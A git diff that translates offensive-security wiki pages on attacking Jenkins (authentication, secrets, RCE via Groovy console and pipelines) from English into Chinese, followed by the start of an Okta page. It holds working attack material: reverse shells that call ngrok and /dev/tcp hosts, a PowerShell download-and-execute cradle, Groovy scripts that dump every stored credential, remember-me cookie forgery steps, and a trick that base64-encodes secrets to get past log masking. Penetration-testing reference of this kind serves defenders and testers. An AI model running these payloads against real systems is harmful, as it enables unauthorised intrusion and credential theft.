- -## References +## 参考文献 - [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins) - [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/) @@ -410,7 +382,3 @@ println(hudson.util.Secret.decrypt("{...}")) - [https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3](https://medium.com/@Proclus/tryhackme-internal-walk-through-90ec901926d3) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md index 6e62a8536..87e50d856 100644 --- a/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md +++ b/src/pentesting-ci-cd/jenkins-security/basic-jenkins-information.md @@ -6,48 +6,48 @@ ### Username + Password -The most common way to login in Jenkins if with a username or a password +在Jenkins中登录的最常见方式是使用用户名或密码。 ### Cookie -If an **authorized cookie gets stolen**, it ca be used to access the session of the user. The cookie is usually called `JSESSIONID.*`. (A user can terminate all his sessions, but he would need to find out first that a cookie was stolen). +如果**授权的cookie被盗取**,它可以用于访问用户的会话。该cookie通常被称为`JSESSIONID.*`。(用户可以终止所有会话,但他需要首先发现cookie被盗取)。 ### SSO/Plugins -Jenkins can be configured using plugins to be **accessible via third party SSO**. +Jenkins可以通过插件配置为**通过第三方SSO访问**。 ### Tokens -**Users can generate tokens** to give access to applications to impersonate them via CLI or REST API. +**用户可以生成令牌**以允许应用程序通过CLI或REST API冒充他们。 ### SSH Keys -This component provides a built-in SSH server for Jenkins. It’s an alternative interface for the [Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/), and commands can be invoked this way using any SSH client. (From the [docs](https://plugins.jenkins.io/sshd/)) +该组件为Jenkins提供了内置的SSH服务器。这是[Jenkins CLI](https://www.jenkins.io/doc/book/managing/cli/)的替代接口,可以使用任何SSH客户端以这种方式调用命令。(来自[docs](https://plugins.jenkins.io/sshd/)) ## Authorization -In `/configureSecurity` it's possible to **configure the authorization method of Jenkins**. There are several options: +在`/configureSecurity`中,可以**配置Jenkins的授权方法**。有几种选项: -- **Anyone can do anything**: Even anonymous access can administrate the server -- **Legacy mode**: Same as Jenkins <1.164. If you have the **"admin" role**, you'll be granted **full control** over the system, and **otherwise** (including **anonymous** users) you'll have **read** access. -- **Logged-in users can do anything**: In this mode, every **logged-in user gets full control** of Jenkins. The only user who won't have full control is **anonymous user**, who only gets **read access**. -- **Matrix-based security**: You can configure **who can do what** in a table. Each **column** represents a **permission**. Each **row** **represents** a **user or a group/role.** This includes a special user '**anonymous**', which represents **unauthenticated users**, as well as '**authenticated**', which represents **all authenticated users**. 
+- **任何人都可以做任何事**:甚至匿名访问也可以管理服务器。 +- **遗留模式**:与Jenkins <1.164相同。如果您拥有**“admin”角色**,您将获得**对系统的完全控制**,否则(包括**匿名**用户)您将只有**读取**权限。 +- **登录用户可以做任何事**:在此模式下,每个**登录用户获得Jenkins的完全控制**。唯一没有完全控制的用户是**匿名用户**,他们只有**读取权限**。 +- **基于矩阵的安全性**:您可以在表中配置**谁可以做什么**。每个**列**代表一个**权限**。每个**行**代表一个**用户或组/角色**。这包括一个特殊用户'**anonymous**',代表**未认证用户**,以及'**authenticated**',代表**所有已认证用户**。 ![](<../../images/image (149).png>) -- **Project-based Matrix Authorization Strategy:** This mode is an **extension** to "**Matrix-based security**" that allows additional ACL matrix to be **defined for each project separately.** -- **Role-Based Strategy:** Enables defining authorizations using a **role-based strategy**. Manage the roles in `/role-strategy`. +- **基于项目的矩阵授权策略**:此模式是对“**基于矩阵的安全性**”的**扩展**,允许为每个项目单独**定义额外的ACL矩阵**。 +- **基于角色的策略**:允许使用**基于角色的策略**定义授权。在`/role-strategy`中管理角色。 ## **Security Realm** -In `/configureSecurity` it's possible to **configure the security realm.** By default Jenkins includes support for a few different Security Realms: +在`/configureSecurity`中,可以**配置安全领域**。默认情况下,Jenkins支持几种不同的安全领域: -- **Delegate to servlet container**: For **delegating authentication a servlet container running the Jenkins controller**, such as [Jetty](https://www.eclipse.org/jetty/). -- **Jenkins’ own user database:** Use **Jenkins’s own built-in user data store** for authentication instead of delegating to an external system. This is enabled by default. -- **LDAP**: Delegate all authentication to a configured LDAP server, including both users and groups. -- **Unix user/group database**: **Delegates the authentication to the underlying Unix** OS-level user database on the Jenkins controller. This mode will also allow re-use of Unix groups for authorization. +- **委托给servlet容器**:用于**委托认证给运行Jenkins控制器的servlet容器**,例如[Jetty](https://www.eclipse.org/jetty/)。 +- **Jenkins自己的用户数据库**:使用**Jenkins自己的内置用户数据存储**进行认证,而不是委托给外部系统。默认启用。 +- **LDAP**:将所有认证委托给配置的LDAP服务器,包括用户和组。 +- **Unix用户/组数据库**:**将认证委托给Jenkins控制器上的底层Unix**操作系统级用户数据库。此模式还允许重用Unix组进行授权。 -Plugins can provide additional security realms which may be useful for incorporating Jenkins into existing identity systems, such as: +插件可以提供额外的安全领域,这可能对将Jenkins纳入现有身份系统有用,例如: - [Active Directory](https://plugins.jenkins.io/active-directory) - [GitHub Authentication](https://plugins.jenkins.io/github-oauth) @@ -55,31 +55,31 @@ Plugins can provide additional security realms which may be useful for incorpora ## Jenkins Nodes, Agents & Executors -Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/): +来自[docs](https://www.jenkins.io/doc/book/managing/nodes/)的定义: -**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold. +**节点**是**构建代理运行的机器**。Jenkins监控每个附加节点的磁盘空间、可用临时空间、可用交换空间、时钟时间/同步和响应时间。如果这些值中的任何一个超出配置的阈值,则节点将被下线。 -**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine. 
+**代理**代表Jenkins控制器**管理任务执行**,通过**使用执行器**。代理可以使用任何支持Java的操作系统。构建和测试所需的工具安装在代理运行的节点上;它们可以**直接安装或在容器中安装**(Docker或Kubernetes)。每个**代理实际上是主机上的一个进程,具有自己的PID**。 -An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time. +**执行器**是**任务执行的插槽**;实际上,它是**代理中的一个线程**。节点上的**执行器数量**定义了可以在该节点上同时执行的**并发任务**的数量。换句话说,这决定了可以在该节点上同时执行的**并发Pipeline `stages`**的数量。 ## Jenkins Secrets ### Encryption of Secrets and Credentials -Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. 
Common key ids include: +来自[docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)的定义:Jenkins使用**AES加密和保护秘密**、凭据及其各自的加密密钥。这些加密密钥存储在`$JENKINS_HOME/secrets/`中,以及用于保护这些密钥的主密钥。该目录应配置为仅允许Jenkins控制器运行的操作系统用户具有对该目录的读写访问(即,`chmod`值为`0700`或使用适当的文件属性)。**主密钥**(有时在密码术语中称为“密钥加密密钥”)是**以\_未加密\_形式存储在Jenkins控制器文件系统中的**`$JENKINS_HOME/secrets/master.key`**,这并不能保护直接访问该文件的攻击者。大多数用户和开发人员将通过[Secret](https://javadoc.jenkins.io/byShortName/Secret) API间接使用这些加密密钥,以加密通用秘密数据或通过凭据API。对于对密码学感兴趣的人,Jenkins在密码块链接(CBC)模式下使用AES,使用PKCS#5填充和随机IV加密存储在`$JENKINS_HOME/secrets/`中的[CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey)实例,文件名对应于其`CryptoConfidentialKey` id。常见的密钥id包括: -- `hudson.util.Secret`: used for generic secrets; -- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types; -- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and +- `hudson.util.Secret`:用于通用秘密; +- `com.cloudbees.plugins.credentials.SecretBytes.KEY`:用于某些凭据类型; +- `jenkins.model.Jenkins.crumbSalt`:由[CSRF保护机制](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)使用;以及 ### Credentials Access -Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job//configure`) and therefore only accessible from the specific project. +凭据可以**作用于全局提供者**(`/credentials/`),任何配置的项目都可以访问,或者可以作用于**特定项目**(`/job//configure`),因此仅可从特定项目访问。 -According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials. 
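Because in-scope credentials are masked in regular build output, a common trick is to encode them before printing. A minimal scripted-pipeline sketch (the credential ID is hypothetical):
```groovy
node {
    // Hypothetical credential ID; the encoded value is not redacted by Jenkins' log masking
    withCredentials([string(credentialsId: 'some-api-token', variable: 'SECRET')]) {
        sh 'echo $SECRET | base64'   // decode offline with: base64 -d
    }
}
```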
+根据[**docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/):在作用域内的凭据可以无限制地提供给管道。为了**防止在构建日志中意外暴露**,凭据在常规输出中被**屏蔽**,因此调用`env`(Linux)或`set`(Windows),或打印其环境或参数的程序将**不会在构建日志中向本来无法访问凭据的用户显示它们**。 -**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.** +**这就是为什么攻击者需要,例如,将凭据进行base64编码以提取凭据。** ## References @@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m - [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md index 9d2b232e1..445b50180 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md @@ -2,108 +2,104 @@ {{#include ../../banners/hacktricks-training.md}} -In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) +在这篇博客文章中,可以找到将Jenkins中的本地文件包含漏洞转化为RCE的好方法:[https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/) -This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own: +这是一个AI生成的摘要,内容涉及如何利用任意cookie的构造来获取RCE,利用本地文件读取,直到我有时间自己创建摘要为止: -### Attack Prerequisites +### 攻击前提 -- **Feature Requirement:** "Remember me" must be enabled (default setting). -- **Access Levels:** Attacker needs Overall/Read permissions. -- **Secret Access:** Ability to read both binary and textual content from key files. 
+- **功能要求:** “记住我”必须启用(默认设置)。 +- **访问级别:** 攻击者需要整体/读取权限。 +- **秘密访问:** 能够读取关键文件中的二进制和文本内容。 -### Detailed Exploitation Process +### 详细利用过程 -#### Step 1: Data Collection +#### 第一步:数据收集 -**User Information Retrieval** +**用户信息检索** -- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather: - - **Username** - - **User seed** - - **Timestamp** - - **Password hash** +- 访问每个用户的用户配置和秘密,从`$JENKINS_HOME/users/*.xml`中收集: +- **用户名** +- **用户种子** +- **时间戳** +- **密码哈希** -**Secret Key Extraction** +**密钥提取** -- Extract cryptographic keys used for signing the cookie: - - **Secret Key:** `$JENKINS_HOME/secret.key` - - **Master Key:** `$JENKINS_HOME/secrets/master.key` - - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` +- 提取用于签名cookie的加密密钥: +- **秘密密钥:** `$JENKINS_HOME/secret.key` +- **主密钥:** `$JENKINS_HOME/secrets/master.key` +- **MAC密钥文件:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac` -#### Step 2: Cookie Forging +#### 第二步:Cookie伪造 -**Token Preparation** +**令牌准备** -- **Calculate Token Expiry Time:** +- **计算令牌过期时间:** - ```javascript - tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time - ``` +```javascript +tokenExpiryTime = currentServerTimeInMillis() + 3600000 // 将当前时间加一小时 +``` -- **Concatenate Data for Token:** +- **连接令牌数据:** - ```javascript - token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey - ``` +```javascript +token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey +``` -**MAC Key Decryption** +**MAC密钥解密** -- **Decrypt MAC Key File:** +- **解密MAC密钥文件:** - ```javascript - key = toAes128Key(masterKey) // Convert master key to AES128 key format - decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file - if not decrypted.hasSuffix("::::MAGIC::::") - return ERROR; - macKey = decrypted.withoutSuffix("::::MAGIC::::") - ``` +```javascript +key = toAes128Key(masterKey) // 将主密钥转换为AES128密钥格式 +decrypted = AES.decrypt(macFile, key) // 解密.mac文件 +if not decrypted.hasSuffix("::::MAGIC::::") +return ERROR; +macKey = decrypted.withoutSuffix("::::MAGIC::::") +``` -**Signature Computation** +**签名计算** -- **Compute HMAC SHA256:** +- **计算HMAC SHA256:** - ```javascript - mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key - tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string - ``` +```javascript +mac = HmacSHA256(token, macKey) // 使用令牌和MAC密钥计算HMAC +tokenSignature = bytesToHexString(mac) // 将MAC转换为十六进制字符串 +``` -**Cookie Encoding** +**Cookie编码** -- **Generate Final Cookie:** +- **生成最终Cookie:** - ```javascript - cookie = base64.encode( - username + ":" + tokenExpiryTime + ":" + tokenSignature - ) // Base64 encode the cookie data - ``` +```javascript +cookie = base64.encode( +username + ":" + tokenExpiryTime + ":" + tokenSignature +) // Base64编码cookie数据 +``` -#### Step 3: Code Execution +#### 第三步:代码执行 -**Session Authentication** +**会话认证** -- **Fetch CSRF and Session Tokens:** - - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`. - - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie. 
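A hedged sketch of that token-fetching step (the URL and cookie values are placeholders):
```bash
# Fetch a crumb and a session cookie while authenticating with the forged remember-me cookie
curl -s -i --cookie "remember-me=$REMEMBER_ME_COOKIE" "$JENKINS_URL/crumbIssuer/api/json"
# Note the "crumb" value in the JSON body (Jenkins-Crumb) and the JSESSIONID.* value in the Set-Cookie header
```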
+- **获取CSRF和会话令牌:** +- 向`/crumbIssuer/api/json`发送请求以获取`Jenkins-Crumb`。 +- 从响应中捕获`JSESSIONID`,该ID将与记住我cookie一起使用。 -**Command Execution Request** +**命令执行请求** -- **Send a POST Request with Groovy Script:** +- **发送带有Groovy脚本的POST请求:** - ```bash - curl -X POST "$JENKINS_URL/scriptText" \ - --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ - --header "Jenkins-Crumb: $CRUMB" \ - --header "Content-Type: application/x-www-form-urlencoded" \ - --data-urlencode "script=$SCRIPT" - ``` +```bash +curl -X POST "$JENKINS_URL/scriptText" \ +--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ +--header "Jenkins-Crumb: $CRUMB" \ +--header "Content-Type: application/x-www-form-urlencoded" \ +--data-urlencode "script=$SCRIPT" +``` - - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment. +- Groovy脚本可用于在Jenkins环境中执行系统级命令或其他操作。 -The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely. +提供的示例curl命令演示了如何使用必要的头和cookie向Jenkins发送请求,以安全地执行任意代码。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md index 8699b8159..2da4bb0b5 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md @@ -3,10 +3,9 @@ {{#include ../../banners/hacktricks-training.md}} > [!WARNING] -> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**. 
- -You can **dump all the secrets from the Groovy Script console** in `/script` running this code +> 请注意,这些脚本只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能也包含 **更多凭据**。 +您可以通过运行此代码在 `/script` 中 **从 Groovy 脚本控制台转储所有秘密**。 ```java // From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/ import jenkins.model.* @@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '') return ``` - -#### or this one: - +#### 或者这个: ```java import java.nio.charset.StandardCharsets; def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( - com.cloudbees.plugins.credentials.Credentials.class +com.cloudbees.plugins.credentials.Credentials.class ) for (c in creds) { - println(c.id) - if (c.properties.description) { - println(" description: " + c.description) - } - if (c.properties.username) { - println(" username: " + c.username) - } - if (c.properties.password) { - println(" password: " + c.password) - } - if (c.properties.passphrase) { - println(" passphrase: " + c.passphrase) - } - if (c.properties.secret) { - println(" secret: " + c.secret) - } - if (c.properties.secretBytes) { - println(" secretBytes: ") - println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8)) - println("") - } - if (c.properties.privateKeySource) { - println(" privateKey: " + c.getPrivateKey()) - } - if (c.properties.apiToken) { - println(" apiToken: " + c.apiToken) - } - if (c.properties.token) { - println(" token: " + c.token) - } - println("") +println(c.id) +if (c.properties.description) { +println(" description: " + c.description) +} +if (c.properties.username) { +println(" username: " + c.username) +} +if (c.properties.password) { +println(" password: " + c.password) +} +if (c.properties.passphrase) { +println(" passphrase: " + c.passphrase) +} +if (c.properties.secret) { +println(" secret: " + c.secret) +} +if (c.properties.secretBytes) { +println(" secretBytes: ") +println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8)) +println("") +} +if (c.properties.privateKeySource) { +println(" privateKey: " + c.getPrivateKey()) +} +if (c.properties.apiToken) { +println(" apiToken: " + c.apiToken) +} +if (c.properties.token) { +println(" token: " + c.token) +} +println("") } ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md index 89ca15223..48a4f9952 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md @@ -1,43 +1,37 @@ -# Jenkins RCE Creating/Modifying Pipeline +# Jenkins RCE 创建/修改管道 {{#include ../../banners/hacktricks-training.md}} -## Creating a new Pipeline +## 创建新管道 -In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:** +在“新项目”(可在 `/view/all/newJob` 访问)中选择 **Pipeline:** ![](<../../images/image (235).png>) -In the **Pipeline section** write the **reverse shell**: +在 **Pipeline 部分** 中写入 **reverse shell**: ![](<../../images/image (285).png>) - ```groovy pipeline { - agent any +agent any - stages { - stage('Hello') { - steps { - sh ''' - curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh - ''' - } - } - } +stages { +stage('Hello') { +steps { +sh ''' +curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh +''' +} +} +} } ``` - -Finally click on **Save**, and **Build Now** and the pipeline will be executed: 
+最后点击 **Save**,然后 **Build Now**,管道将被执行: ![](<../../images/image (228).png>) -## Modifying a Pipeline +## 修改管道 -If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed. +如果您可以访问某个已配置管道的配置文件,您可以直接 **修改它,附加您的反向 shell**,然后执行它或等待它被执行。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md index f16096070..f1a0ee3cd 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md @@ -1,40 +1,36 @@ -# Jenkins RCE Creating/Modifying Project +# Jenkins RCE 创建/修改项目 {{#include ../../banners/hacktricks-training.md}} -## Creating a Project +## 创建项目 -This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). +此方法非常嘈杂,因为您必须创建一个全新的项目(显然,这仅在您允许用户创建新项目时有效)。 -1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob` -2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ -3. Click **Build now** - 1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *` - 2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl :@/job//build?token=`** +1. **创建一个新项目**(自由风格项目),点击“新建项目”或在 `/view/all/newJob` +2. 在 **构建** 部分设置 **执行 shell**,并粘贴一个 powershell Empire 启动器或一个 meterpreter powershell(可以使用 _unicorn_ 获得)。使用 _PowerShell.exe_ 启动有效载荷,而不是使用 _powershell._ +3. 点击 **立即构建** +1. 如果 **立即构建** 按钮没有出现,您仍然可以转到 **配置** --> **构建触发器** --> `定期构建` 并设置一个 cron 为 `* * * * *` +2. 除了使用 cron,您还可以使用配置“**远程触发构建**”,您只需设置一个 api 令牌名称来触发作业。然后转到您的用户配置文件并 **生成一个 API 令牌**(将此 API 令牌称为您用于触发作业的 api 令牌)。最后,使用以下命令触发作业:**`curl :@/job//build?token=`** ![](<../../images/image (165).png>) -## Modifying a Project +## 修改项目 -Go to the projects and check **if you can configure any** of them (look for the "Configure button"): +转到项目并检查 **您是否可以配置任何** 项目(查找“配置按钮”): ![](<../../images/image (265).png>) -If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others). +如果您 **看不到任何** **配置** **按钮**,那么您 **可能无法** **配置** 它(但检查所有项目,因为您可能能够配置其中一些而不是其他项目)。 -Or **try to access to the path** `/job//configure` or `/me/my-views/view/all/job//configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`). 
+或者 **尝试访问路径** `/job//configure` 或 `/me/my-views/view/all/job//configure` \_\_ 在每个项目中(示例:`/job/Project0/configure` 或 `/me/my-views/view/all/job/Project0/configure`)。 -## Execution +## 执行 -If you are allowed to configure the project you can **make it execute commands when a build is successful**: +如果您被允许配置项目,您可以 **使其在构建成功时执行命令**: ![](<../../images/image (98).png>) -Click on **Save** and **build** the project and your **command will be executed**.\ -If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. +点击 **保存** 并 **构建** 项目,您的 **命令将被执行**。\ +如果您不是在执行反向 shell 而是一个简单命令,您可以 **在构建的输出中查看命令的输出**。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md index 33821cc03..36e859144 100644 --- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md +++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md @@ -4,24 +4,21 @@ ## Jenkins RCE with Groovy Script -This is less noisy than creating a new project in Jenkins - -1. Go to _path_jenkins/script_ -2. Inside the text box introduce the script +这比在Jenkins中创建新项目要安静得多 +1. 转到 _path_jenkins/script_ +2. 在文本框中输入脚本 ```python def process = "PowerShell.exe ".execute() println "Found text ${process.text}" ``` +您可以使用以下命令执行: `cmd.exe /c dir` -You could execute a command using: `cmd.exe /c dir` +在 **linux** 中,您可以这样做: **`"ls /".execute().text`** -In **linux** you can do: **`"ls /".execute().text`** - -If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. - -**Another useful groovy script** is (replace \[INSERT COMMAND]): +如果您需要在文本中使用 _引号_ 和 _单引号_,可以使用 _"""PAYLOAD"""_(三重双引号)来执行有效载荷。 +**另一个有用的 groovy 脚本** 是(替换 \[INSERT COMMAND]): ```python def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() @@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` - -### Reverse shell in linux - +### Linux中的反向Shell ```python def sout = new StringBuffer(), serr = new StringBuffer() def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() @@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr" ``` +### Windows中的反向Shell -### Reverse shell in windows - -You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: - +您可以准备一个带有PS反向Shell的HTTP服务器,并使用Jeking下载并执行它: ```python scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc ``` - ### Script -You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py). 
- -You can use MSF to get a reverse shell: +您可以使用[**此脚本**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py)自动化此过程。 +您可以使用 MSF 获取反向 shell: ``` msf> use exploit/multi/http/jenkins_script_console ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md index e682996c2..e871e53b3 100644 --- a/src/pentesting-ci-cd/okta-security/README.md +++ b/src/pentesting-ci-cd/okta-security/README.md @@ -2,117 +2,113 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices. +[Okta, Inc.](https://www.okta.com/) 在身份和访问管理领域因其基于云的软件解决方案而受到认可。这些解决方案旨在简化和保护各种现代应用程序的用户身份验证。它们不仅服务于希望保护敏感数据的公司,还服务于希望将身份控制集成到应用程序、网络服务和设备中的开发人员。 -The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to: +Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品,包括但不限于: -- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications. -- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification. -- **Lifecycle Management**: Automates user account creation, update, and deactivation processes. -- **Universal Directory**: Enables centralized management of users, groups, and devices. -- **API Access Management**: Secures and manages access to APIs. +- **单点登录 (SSO)**:通过允许在多个应用程序中使用一组登录凭据来简化用户访问。 +- **多因素身份验证 (MFA)**:通过要求多种验证形式来增强安全性。 +- **生命周期管理**:自动化用户帐户的创建、更新和停用过程。 +- **通用目录**:实现用户、组和设备的集中管理。 +- **API 访问管理**:保护和管理对 API 的访问。 -These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is 